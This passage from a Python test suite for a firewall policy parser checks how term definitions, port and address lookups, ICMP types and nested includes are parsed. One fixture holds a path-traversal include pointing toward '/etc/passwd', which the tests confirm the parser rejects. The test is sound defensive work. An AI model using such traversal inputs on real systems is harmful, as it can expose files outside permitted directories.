BAD_INCLUDED_FILE_1 = """
term included-term-1 {
protocol:: tcp
action:: accept
}
#include "includes/../../etc/passwd.inc"
"""
GOOD_INCLUDED_FILE_1 = """
term good-included-term-1 {
protocol:: tcp
action:: accept
}
#include "includes/../pol/z.inc"
"""
GOOD_TERM_0 = """
term good-term-0 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_1 = """
term good-term-1 {
protocol:: icmp
action:: accept
}
"""
GOOD_TERM_2 = """
term good-term-2 {
protocol:: tcp
source-address:: PROD_NETWRK
action:: accept
}
"""
GOOD_TERM_3 = """
term good-term-3 {
protocol:: tcp
source-address:: PROD_NETWRK
destination-port:: SMTP
action:: accept
}
"""
GOOD_TERM_4 = """
term good-term-4 {
protocol:: 1
action:: accept
}
"""
GOOD_TERM_5 = """
term good-term-5 {
action:: accept
}
"""
GOOD_TERM_6 = """
term good-term-6 {
protocol:: tcp
destination-port:: MYSQL HIGH_PORTS
action:: accept
}
"""
GOOD_TERM_7 = """
term good-term-7 {
protocol:: tcp
destination-address:: PROD_NETWRK
destination-exclude:: PROD_EH
action:: accept
}
"""
GOOD_TERM_8 = """
term good-term-8 {
protocol:: tcp udp
destination-port:: DNS
action:: accept
}
"""
GOOD_TERM_9 = """
term good-term-9 {
comment:: "first comment"
comment:: "second comment"
action:: accept
}
"""
GOOD_TERM_10 = """
term good-term-10 {
logging:: true
action:: accept
}
"""
GOOD_TERM_11 = """
term good-term-11 {
protocol:: icmp
icmp-type:: echo-reply echo-request unreachable
action:: accept
}
"""
GOOD_TERM_12 = """
term qos-good-term-12 {
action:: accept
qos:: af4
}
"""
GOOD_TERM_13 = """
term good-term-13 {
source-port:: GOOGLE_PUBLIC
source-port:: SNMP
protocol:: udp
action:: accept
}
"""
GOOD_TERM_14 = """
term good-term-14 {
source-prefix:: foo_prefix_list
action:: accept
}
"""
GOOD_TERM_15 = """
term good-term-15 {
destination-prefix:: bar_prefix_list baz_prefix_list
action:: accept
}
"""
GOOD_TERM_16 = """
term good-term-16 {
ether-type:: arp ipv4
ether-type:: vlan
action:: accept
}
"""
GOOD_TERM_17 = """
term good-term-17 {
traffic-type:: broadcast unknown-unicast
traffic-type:: multicast
action:: accept
}
"""
GOOD_TERM_18 = """
term good-term-18 {
comment:: "test verbatim output"
verbatim:: iptables "mary had a little lamb"
verbatim:: juniper "mary had another lamb"
}
"""
GOOD_TERM_19 = """
term good-term-19 {
source-port:: HTTP MYSQL
destination-address:: PROD_EXTERNAL_SUPER PROD_NETWRK
protocol:: tcp
action:: accept
}
"""
GOOD_TERM_20 = """
term good-term-20 {
source-port:: MYSQL HTTP
destination-address:: PROD_NETWRK PROD_EXTERNAL_SUPER
protocol:: tcp
action:: accept
}
"""
GOOD_TERM_21 = """
term good-term-21 {
source-port:: MYSQL HTTPS
destination-address:: PROD_NETWRK PROD_EXTERNAL_SUPER
protocol:: tcp
action:: accept
}
"""
GOOD_TERM_22 = """
term precedence-term {
protocol:: icmp
precedence:: 1
action:: accept
}
"""
GOOD_TERM_23 = """
term loss-priority-term {
source-port:: SSH
protocol:: tcp
loss-priority:: low
action:: accept
}
"""
GOOD_TERM_24 = """
term routing-instance-term {
source-port:: SSH
protocol:: tcp
routing-instance:: foobar-router
}
"""
GOOD_TERM_25 = """
term source-interface-term {
source-port:: SSH
protocol:: tcp
source-interface:: foo0
action:: accept
}
"""
GOOD_TERM_26 = """
term good-term-26 {
protocol:: tcp
source-address:: PROD_NETWRK
source-exclude:: PROD_EH
action:: accept
}
"""
GOOD_TERM_27 = """
term good-term-27 {
protocol:: tcp
address:: PROD_NETWRK
address-exclude:: PROD_EH
action:: accept
}
"""
GOOD_TERM_28 = """
term good-term-28 {
protocol:: tcp
source-address:: PROD_NETWRK
source-exclude:: BOTTOM_HALF
action:: accept
}
"""
GOOD_TERM_29 = """
term good-term-29 {
protocol:: tcp
option:: tcp-established
source-address:: PROD_NETWRK
action:: accept
}
"""
GOOD_TERM_30 = """
term good-term-30 {
protocol:: tcp
action:: accept
vpn:: special-30
}
"""
GOOD_TERM_31 = """
term good-term-31 {
protocol:: tcp
action:: accept
vpn:: special-31 policy-11
}
"""
GOOD_TERM_32 = """
term good-term-32 {
forwarding-class:: fritzy
action:: accept
}
"""
GOOD_TERM_33 = """
term good-term-33 {
forwarding-class:: flashy
action:: accept
}
"""
GOOD_TERM_34 = """
term good-term-34 {
source-tag:: src-tag
destination-tag:: dest-tag
action:: accept
}
"""
GOOD_TERM_35 = """
term good-term-35 {
source-address:: PROD_NETWRK
next-ip:: NEXT_IP
}
"""
GOOD_TERM_36 = """
term good-term-36 {
forwarding-class:: flashy fritzy
action:: accept
}
"""
GOOD_TERM_37 = """
term good-term-37 {
protocol:: icmp
action:: accept
log_name:: "my special prefix"
}
"""
GOOD_TERM_38 = """
term good-term-38 {
source-prefix-except:: foo_prefix_list
action:: accept
}
"""
GOOD_TERM_39 = """
term good-term-39 {
destination-prefix-except:: bar_prefix_list baz_prefix_list
action:: accept
}
"""
GOOD_TERM_40 = """
term good-term-38 {
source-prefix:: foo_prefix_list
source-prefix-except:: foo_prefix_list_except
action:: accept
}
"""
GOOD_TERM_41 = """
term good-term-39 {
destination-prefix:: bar_prefix_list
destination-prefix-except:: bar_prefix_list_except
action:: accept
}
"""
GOOD_TERM_42 = """
term good-term-42 {
protocol:: icmp
icmp-type:: unreachable
icmp-code:: 3 4
action:: accept
}
"""
GOOD_TERM_43 = """
term good-term-43 {
ttl:: 10
action:: accept
}
"""
GOOD_TERM_44 = """
term good-term-44 {
logging:: syslog
log-limit:: 999/day
action:: accept
}
"""
GOOD_TERM_45 = """
term good-term-45 {
source-address:: ANY
action:: accept
target-service-accounts:: acct1@blah.com
}
"""
GOOD_TERM_46 = """
term good-term-46 {
protocol:: icmp tcp udp gre esp ah sctp
encapsulate:: stuff_and_things
}
"""
GOOD_TERM_47 = """
term good-term-47 {
protocol:: icmp tcp udp gre esp ah sctp
port-mirror:: true
}
"""
GOOD_TERM_48 = """
term good-term-48 {
protocol:: icmp
source-zone:: zone1 zone2
destination-zone:: zone1 zone2
action:: accept
}
"""
GOOD_TERM_49 = """
term good-term-46 {
protocol:: udp
decapsulate:: mpls-in-udp
}
"""
GOOD_TERM_50 = """
term good-term-45 {
source-address:: ANY
action:: accept
source-service-accounts:: acct1@blah.com
}
"""
GOOD_TERM_V6_1 = """
term good-term-v6-1 {
hop-limit:: 5
action:: accept
}
"""
GOOD_TERM_V6_2 = """
term good-term-v6-1 {
hop-limit:: 5-7
action:: accept
}
"""
TERM_SUPER_2 = """
term term-super {
address:: PROD
action:: accept
}
"""
TERM_SUPER_3 = """
term term-super {
protocol-except:: tcp udp icmpv6
counter:: stuff_and_things
action:: reject
}
"""
TERM_SUB_2 = """
term term-sub {
protocol:: icmp
action:: accept
}
"""
TERM_UNSORTED_ICMP_TYPE = """
term good-term-11 {
protocol:: icmp
icmp-type:: unreachable echo-request echo-reply
action:: accept
}
"""
TERM_UNSORTED_ICMP_CODE = """
term good-term-11 {
icmp-type:: unreachable
icmp-code:: 15 4 9 1
action:: accept
}
"""
BAD_TERM_1 = """
term bad-term- 1 {
protocol:: tcp
action:: reject
}
"""
BAD_TERM_2 = """
term bad-term-2 {
prootocol:: tcp
action:: accept
}
"""
BAD_TERM_3 = """
term bad-term-3 {
protocol:: tcp
source-port:: SNMP
action:: accept
}
"""
BAD_TERM_4 = """
term bad-term-4 {
source-port:: SMTP
action:: accept
}
"""
BAD_TERM_5 = """
term bad-term-5 {
protocol:: tcp
destination-address:: PROD_EH
destination-exclude:: PROD_NETWRK
action:: accept
}
"""
BAD_TERM_6 = """
term bad-term-6 {
logging:: unvalidloggingoption
action:: accept
}
"""
BAD_TERM_7 = """
term bad-term-7 {
action:: discard
}
"""
BAD_TERM_8 = """
term bad-term-8 {
akshun:: accept
}
"""
BAD_TERM_9 = """
term bad-term-9 {
ether-type:: arp
protocol:: udp
action:: accept
}
"""
BAD_TERM_10 = """
term bad-term-10 {
verbatim:: cisco "mary had a little lamb"
action:: accept
}
"""
BAD_TERM_12 = """
term bad-term-12 {
protocol:: icmp
icmp-type:: echo-foo packet-too-beaucoups
action:: accept
}
"""
BAD_TERM_13 = """
term bad-term-13 {
protocol:: icmp
icmp-type:: unreachable
icmp-code:: 99
action:: accept
}
"""
BAD_TERM_14 = """
term bad-term-14 {
protocol:: icmp
icmp-type:: unreachable redirect
icmp-code:: 3
action:: accept
}
"""
BAD_TERM_15 = """
term bad-term-15 {
ttl:: 300
action:: accept
}
"""
BAD_TERM_16 = """
term bad-term-16 {
destination-port:: FOO
protocol:: tcp udp gre
action:: accept
}
"""
# pylint: disable=maybe-no-member
class PolicyTest(absltest.TestCase):
def setUp(self):
super().setUp()
self.naming = mock.create_autospec(naming.Naming)
@mock.patch.object(policy, '_ReadFile')
def testIncludes(self, mock_file):
"""Ensure includes work, as well as nested included."""
mock_file.side_effect = [INCLUDED_Y_FILE, GOOD_TERM_5]
# contents of our base policy (which has an included file)
pol = HEADER + INCLUDE_STATEMENT + GOOD_TERM_1
p = policy.ParsePolicy(pol, self.naming)
_, terms = p.filters[0]
# ensure include worked and we now have 3 terms in this policy
self.assertEqual(len(terms), 3)
# ensure included_term_1 is included as first term
self.assertEqual(terms[0].name, 'included-term-1')
# ensure good-term-5 is included as second term
self.assertEqual(terms[1].name, 'good-term-5')
    # ensure good-term-1 shows up as the third term
self.assertEqual(terms[2].name, 'good-term-1')
mock_file.assert_has_calls(
[mock.call('includes/y.inc'), mock.call('includes/z.inc')]
)
@mock.patch.object(policy, '_ReadFile')
def testBadIncludes(self, mock_file):
"""Ensure nested includes error handling works."""
mock_file.side_effect = [BAD_INCLUDED_FILE, GOOD_TERM_5]
# contents of our base policy (which has a bad included file)
pol = HEADER + INCLUDE_STATEMENT + GOOD_TERM_1
self.assertRaises(
policy.InvalidIncludeDirectoryError,
policy.ParsePolicy,
pol,
self.naming,
)
# Ensuring relative paths don't bypass invalid directory checks
mock_file.side_effect = [BAD_INCLUDED_FILE_1, GOOD_TERM_5]
pol = HEADER + BAD_INCLUDED_FILE_1 + GOOD_TERM_1
self.assertRaises(
policy.InvalidIncludeDirectoryError,
policy.ParsePolicy,
pol,
self.naming,
)
@mock.patch.object(policy, '_ReadFile')
def testGoodIncludesWithRelativePaths(self, mock_file):
"""Ensure nested includes error handling works for valid files."""
mock_file.side_effect = [GOOD_TERM_5]
# base policy has a good included file, with relative paths
pol = HEADER + GOOD_INCLUDED_FILE_1 + GOOD_TERM_1
p = policy.ParsePolicy(pol, self.naming)
_, terms = p.filters[0]
# ensure include worked and we now have 3 terms in this policy
self.assertEqual(len(terms), 3)
self.assertEqual(terms[0].name, 'good-included-term-1')
self.assertEqual(terms[1].name, 'good-term-5')
self.assertEqual(terms[2].name, 'good-term-1')
def testGoodPol(self):
pol = HEADER + GOOD_TERM_1 + GOOD_TERM_2
self.naming.GetNetAddr.return_value = [nacaddr.IPv4('10.0.0.0/8')]
ret = policy.ParsePolicy(pol, self.naming)
# we should only have one filter from that
self.assertEqual(len(ret.filters), 1)
header, terms = ret.filters[0]
self.assertEqual(type(ret), policy.Policy)
self.assertEqual(str(terms[0].protocol[0]), 'icmp')
self.assertEqual(len(terms), 2)
# the comment is stored as a double quoted string, complete with double
# quotes.
self.assertEqual(str(header.comment[0]), 'this is a test acl')
self.assertEqual(str(header.comment[1]), 'this is another comment')
self.assertEqual(str(header.target[0]), 'juniper')
self.naming.GetNetAddr.assert_called_once_with('PROD_NETWRK')
def testBadPol(self):
pol = HEADER + BAD_TERM_1
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testMissingHeader(self):
pol = GOOD_TERM_1 + GOOD_TERM_2
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testService(self):
pol = HEADER + GOOD_TERM_1 + GOOD_TERM_3
self.naming.GetNetAddr.return_value = [nacaddr.IPv4('10.0.0.0/8')]
self.naming.GetServiceByProto.return_value = ['25']
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 2)
self.assertEqual(str(terms[1].protocol[0]), 'tcp')
self.assertEqual(terms[1].destination_port[0], (25, 25))
self.naming.GetNetAddr.assert_called_once_with('PROD_NETWRK')
self.naming.GetServiceByProto.assert_called_once_with('SMTP', 'tcp')
def testInvalidKeyword(self):
pol = HEADER + BAD_TERM_2
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testNumericProtocol(self):
pol = HEADER + GOOD_TERM_4
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].protocol[0]), '1')
def testHopLimitSingle(self):
pol = HEADER_V6 + GOOD_TERM_V6_1
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].hop_limit[0]), '5')
def testHopLimitRange(self):
pol = HEADER_V6 + GOOD_TERM_V6_2
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].hop_limit[2]), '7')
def testBadPortProtocols(self):
pol = HEADER + BAD_TERM_3
    self.naming.GetServiceByProto.return_value = []
self.assertRaises(
policy.TermPortProtocolError, policy.ParsePolicy, pol, self.naming
)
def testBadPortProtocols2(self):
pol = HEADER + BAD_TERM_4
self.assertRaises(
policy.TermPortProtocolError, policy.ParsePolicy, pol, self.naming
)
def testMinimumTerm(self):
pol = HEADER + GOOD_TERM_5
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 1)
self.assertEqual(str(terms[0].action[0]), 'accept')
def testPortCollapsing(self):
pol = HEADER + GOOD_TERM_6
    self.naming.GetServiceByProto.side_effect = [['3306'], ['1024-65535']]
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertSequenceEqual(terms[0].destination_port, [(1024, 65535)])
self.naming.GetServiceByProto.assert_has_calls(
[mock.call('MYSQL', 'tcp'), mock.call('HIGH_PORTS', 'tcp')],
any_order=True,
)
def testPortCollapsing2(self):
pol = HEADER + GOOD_TERM_8
self.naming.GetServiceByProto.side_effect = [['53'], ['53']]
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertSequenceEqual(terms[0].destination_port, [(53, 53)])
self.naming.GetServiceByProto.assert_has_calls(
[mock.call('DNS', 'tcp'), mock.call('DNS', 'udp')], any_order=True
)
def testMinimumTerm2(self):
pol = HEADER + GOOD_TERM_9
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].comment[0]), 'first comment')
self.assertEqual(str(terms[0].comment[1]), 'second comment')
def testLogNameTerm(self):
pol = HEADER_6 + GOOD_TERM_37
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].log_name), 'my special prefix')
def testTermEquality(self):
self.naming.GetNetAddr.side_effect = [
[
nacaddr.IPv4('64.233.160.0/19'),
nacaddr.IPv4('66.102.0.0/20'),
nacaddr.IPv4('66.249.80.0/20'),
nacaddr.IPv4('72.14.192.0/18'),
nacaddr.IPv4('72.14.224.0/20'),
nacaddr.IPv4('216.239.32.0/19'),
],
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/8')],
[
nacaddr.IPv4('64.233.160.0/19'),
nacaddr.IPv4('66.102.0.0/20'),
nacaddr.IPv4('66.249.80.0/20'),
nacaddr.IPv4('72.14.192.0/18'),
nacaddr.IPv4('72.14.224.0/20'),
nacaddr.IPv4('216.239.32.0/19'),
],
[nacaddr.IPv4('10.0.0.0/8')],
[
nacaddr.IPv4('64.233.160.0/19'),
nacaddr.IPv4('66.102.0.0/20'),
nacaddr.IPv4('66.249.80.0/20'),
nacaddr.IPv4('72.14.192.0/18'),
nacaddr.IPv4('72.14.224.0/20'),
nacaddr.IPv4('216.239.32.0/19'),
],
]
self.naming.GetServiceByProto.side_effect = [
['80'],
['3306'],
['3306'],
['80'],
['3306'],
['443'],
]
pol_text = HEADER + GOOD_TERM_19 + GOOD_TERM_20 + GOOD_TERM_21
ret = policy.ParsePolicy(pol_text, self.naming, shade_check=False)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(len(terms), 3)
self.assertEqual(terms[0], terms[1])
self.assertNotEqual(terms[0], terms[2])
self.naming.GetNetAddr.assert_has_calls(
[
mock.call('PROD_EXTERNAL_SUPER'),
mock.call('PROD_NETWRK'),
mock.call('PROD_NETWRK'),
mock.call('PROD_EXTERNAL_SUPER'),
mock.call('PROD_NETWRK'),
mock.call('PROD_EXTERNAL_SUPER'),
],
any_order=True,
)
self.naming.GetServiceByProto.assert_has_calls(
[
mock.call('HTTP', 'tcp'),
mock.call('MYSQL', 'tcp'),
mock.call('MYSQL', 'tcp'),
mock.call('HTTP', 'tcp'),
mock.call('MYSQL', 'tcp'),
mock.call('HTTPS', 'tcp'),
],
any_order=True,
)
def testGoodDestAddrExcludes(self):
pol = HEADER + GOOD_TERM_7
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].destination_address_exclude[0], nacaddr.IPv4('10.62.0.0/15')
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodSrcAddrExcludes(self):
pol = HEADER + GOOD_TERM_26
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].source_address_exclude[0], nacaddr.IPv4('10.62.0.0/15')
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludes(self):
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.62.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
self.assertEqual(terms[0].address_exclude[0], nacaddr.IPv4('10.62.0.0/15'))
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludesFlatten(self):
expected = sorted([
nacaddr.IPv4('10.0.0.0/11'),
nacaddr.IPv4('10.32.0.0/12'),
nacaddr.IPv4('10.48.0.0/13'),
nacaddr.IPv4('10.56.0.0/14'),
nacaddr.IPv4('10.60.0.0/15'),
nacaddr.IPv4('10.64.0.0/10'),
nacaddr.IPv4('10.130.0.0/15'),
nacaddr.IPv4('10.132.0.0/14'),
nacaddr.IPv4('10.136.0.0/13'),
nacaddr.IPv4('10.144.0.0/12'),
nacaddr.IPv4('10.160.0.0/11'),
nacaddr.IPv4('10.192.0.0/10'),
])
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[
nacaddr.IPv4('10.62.0.0/15'),
nacaddr.IPv4('10.129.0.0/15', strict=False),
],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
terms[0].FlattenAll()
self.assertEqual(sorted(terms[0].address), expected)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludesFlattenMultiple(self):
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[
nacaddr.IPv4('10.1.0.0/16'),
nacaddr.IPv4('10.2.0.0/16'),
nacaddr.IPv4('10.3.0.0/16'),
nacaddr.IPv4('192.168.0.0/16'),
],
[nacaddr.IPv4('10.2.0.0/15')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
terms[0].FlattenAll()
self.assertEqual(
terms[0].address,
[nacaddr.IPv4('10.1.0.0/16'), nacaddr.IPv4('192.168.0.0/16')],
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testGoodAddrExcludesFlattenAll(self):
pol = HEADER + GOOD_TERM_27
self.naming.GetNetAddr.side_effect = [
[
nacaddr.IPv4('10.1.0.0/16'),
nacaddr.IPv4('10.2.0.0/16'),
nacaddr.IPv4('10.3.0.0/16'),
],
[nacaddr.IPv4('10.0.0.0/8')],
]
ret = policy.ParsePolicy(pol, self.naming)
_, terms = ret.filters[0]
terms[0].FlattenAll()
self.assertEqual(terms[0].address, [])
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_EH')], any_order=True
)
def testLogging(self):
pol = HEADER + GOOD_TERM_10
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(str(terms[0].logging[0]), 'true')
def testBadLogging(self):
pol = HEADER + BAD_TERM_6
self.assertRaises(
policy.InvalidTermLoggingError, policy.ParsePolicy, pol, self.naming
)
def testBadAction(self):
pol = HEADER + BAD_TERM_7
self.assertRaises(
policy.InvalidTermActionError, policy.ParsePolicy, pol, self.naming
)
def testMultifilter(self):
pol = HEADER + GOOD_TERM_1 + HEADER_2 + GOOD_TERM_1
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.headers), 2)
def testBadMultifilter(self):
pol = HEADER + HEADER_2 + GOOD_TERM_1
self.assertRaises(policy.NoTermsError, policy.ParsePolicy, pol, self.naming)
def testICMPTypes(self):
pol = HEADER + GOOD_TERM_11
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].icmp_type[0], 'echo-reply')
def testBadICMPTypes(self):
pol = HEADER + BAD_TERM_12
self.assertRaises(
policy.TermInvalidIcmpType, policy.ParsePolicy, pol, self.naming
)
def testICMPTypesSorting(self):
pol = HEADER + TERM_UNSORTED_ICMP_TYPE
ret = policy.ParsePolicy(pol, self.naming)
icmp_types = ['echo-reply', 'echo-request', 'unreachable']
expected = 'icmp_type: %s' % icmp_types
self.assertIn(expected, str(ret))
def testICMPCodesSorting(self):
pol = HEADER + TERM_UNSORTED_ICMP_CODE
ret = policy.ParsePolicy(pol, self.naming)
self.assertIn('icmp_code: [1, 4, 9, 15]', str(ret))
def testReservedWordTermName(self):
pol = HEADER + GOOD_TERM_12
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].qos, 'af4')
self.assertEqual(terms[0].name, 'qos-good-term-12')
def testMultiPortLines(self):
pol = HEADER + GOOD_TERM_13
self.naming.GetServiceByProto.side_effect = [['22', '160-162'], ['161']]
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertSequenceEqual(terms[0].source_port, [(22, 22), (160, 162)])
self.naming.GetServiceByProto.assert_has_calls(
[mock.call('GOOGLE_PUBLIC', 'udp'), mock.call('SNMP', 'udp')],
any_order=True,
)
def testErrorLineNumber(self):
pol = HEADER + GOOD_TERM_13 + BAD_TERM_8
self.assertRaisesRegex(
policy.ParseError,
r'ERROR on "akshun" \(type STRING, line 1',
policy.ParsePolicy,
pol,
self.naming,
)
def testPrefixList(self):
spol = HEADER + GOOD_TERM_14
dpol = HEADER + GOOD_TERM_15
# check on the source prefix list
ret = policy.ParsePolicy(spol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].source_prefix, ['foo_prefix_list'])
# check on the destination prefix list
ret = policy.ParsePolicy(dpol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].destination_prefix, ['bar_prefix_list', 'baz_prefix_list']
)
def testPrefixListExcept(self):
spol = HEADER + GOOD_TERM_38
dpol = HEADER + GOOD_TERM_39
# check on the source prefix except list
ret = policy.ParsePolicy(spol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].source_prefix_except, ['foo_prefix_list'])
# check on the destination prefix except list
ret = policy.ParsePolicy(dpol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(
terms[0].destination_prefix_except,
['bar_prefix_list', 'baz_prefix_list'],
)
def testPrefixListMixed(self):
spol = HEADER + GOOD_TERM_40
dpol = HEADER + GOOD_TERM_41
# check on the source prefix list with mixed values
ret = policy.ParsePolicy(spol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].source_prefix, ['foo_prefix_list'])
self.assertEqual(terms[0].source_prefix_except, ['foo_prefix_list_except'])
# check on the destination prefix with mixed values
ret = policy.ParsePolicy(dpol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].destination_prefix, ['bar_prefix_list'])
self.assertEqual(
terms[0].destination_prefix_except, ['bar_prefix_list_except']
)
def testEtherTypes(self):
pol = HEADER + GOOD_TERM_16
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].ether_type[0], 'arp')
self.assertEqual(terms[0].ether_type[1], 'ipv4')
self.assertEqual(terms[0].ether_type[2], 'vlan')
def testTrafficTypes(self):
pol = HEADER + GOOD_TERM_17
ret = policy.ParsePolicy(pol, self.naming)
self.assertEqual(len(ret.filters), 1)
_, terms = ret.filters[0]
self.assertEqual(terms[0].traffic_type[0], 'broadcast')
self.assertEqual(terms[0].traffic_type[1], 'unknown-unicast')
self.assertEqual(terms[0].traffic_type[2], 'multicast')
def testBadProtocolEtherTypes(self):
pol = HEADER + BAD_TERM_9
self.assertRaises(
policy.TermProtocolEtherTypeError, policy.ParsePolicy, pol, self.naming
)
def testVerbatimTerm(self):
pol = policy.ParsePolicy(HEADER + GOOD_TERM_18, self.naming)
_, terms = pol.filters[0]
self.assertEqual(terms[0].verbatim[0][0], 'iptables')
self.assertEqual(terms[0].verbatim[0][1], 'mary had a little lamb')
self.assertEqual(terms[0].verbatim[1][0], 'juniper')
self.assertEqual(terms[0].verbatim[1][1], 'mary had another lamb')
def testVerbatimMixed(self):
pol = HEADER + BAD_TERM_10
self.assertRaises(policy.ParseError, policy.ParsePolicy, pol, self.naming)
def testIntegerFilterName(self):
pol_text = HEADER_3 + GOOD_TERM_0
pol = policy.ParsePolicy(pol_text, self.naming)
self.assertEqual(pol.headers[0].target[0].options[0], '50')
def testPrecedence(self):
pol_text = HEADER + GOOD_TERM_22
pol = policy.ParsePolicy(pol_text, self.naming)
self.assertEqual(len(pol.filters), 1)
_, terms = pol.filters[0]
self.assertEqual(terms[0].precedence, [1])
def testLossPriority(self):
self.naming.GetServiceByProto.return_value = ['22']
pol = policy.ParsePolicy(HEADER + GOOD_TERM_23, self.naming)
self.assertEqual(len(pol.filters), 1)
_, terms = pol.filters[0]
self.assertEqual(terms[0].loss_priority, 'low')
self.naming.GetServiceByProto.assert_called_once_with('SSH', 'tcp')
def testRoutingInstance(self):
self.naming.GetServiceByProto.return_value = ['22']
pol = policy.ParsePolicy(HEADER + GOOD_TERM_24, self.naming)
self.assertEqual(len(pol.filters), 1)
_, terms = pol.filters[0]
self.assertEqual(terms[0].routing_instance, 'foobar-router')
self.naming.GetServiceByProto.assert_called_once_with('SSH', 'tcp')
def testSourceInterface(self):
self.naming.GetServiceByProto.return_value = ['22']
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_25, self.naming)
self.assertEqual(len(pol.filters), 1)
header, terms = pol.filters[0]
self.assertEqual(str(header.target[0]), 'iptables')
self.assertEqual(terms[0].source_interface, 'foo0')
self.naming.GetServiceByProto.assert_called_once_with('SSH', 'tcp')
def testShadingDetection(self):
pol2 = HEADER + GOOD_TERM_2 + GOOD_TERM_3
self.naming.GetNetAddr.side_effect = [
[nacaddr.IPv4('10.0.0.0/8')],
[nacaddr.IPv4('10.0.0.0/8')],
]
self.naming.GetServiceByProto.return_value = ['25']
# same protocol, same saddr, shaded term defines a port.
self.assertRaises(
policy.ShadingError,
policy.ParsePolicy,
pol2,
self.naming,
shade_check=True,
)
self.naming.GetNetAddr.assert_has_calls(
[mock.call('PROD_NETWRK'), mock.call('PROD_NETWRK')]
)
self.naming.GetServiceByProto.assert_called_once_with('SMTP', 'tcp')
def testVpnConfigWithoutPairPolicy(self):
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_30, self.naming)
self.assertEqual(len(pol.filters), 1)
self.assertEqual('special-30', pol.filters[0][1][0].vpn[0])
self.assertEqual('', pol.filters[0][1][0].vpn[1])
def testVpnConfigWithPairPolicy(self):
pol = policy.ParsePolicy(HEADER_4 + GOOD_TERM_31, self.naming)
self.assertEqual(len(pol.filters), 1)
self.assertEqual('special-31', pol.filters[0][1][0].vpn[0])
self.assertEqual('policy-11', pol.filters[0][1][0].vpn[1])
def testForwardingClassPolicy(self):
pol = policy.ParsePolicy(HEADER + GOOD_TERM_32, self.naming)
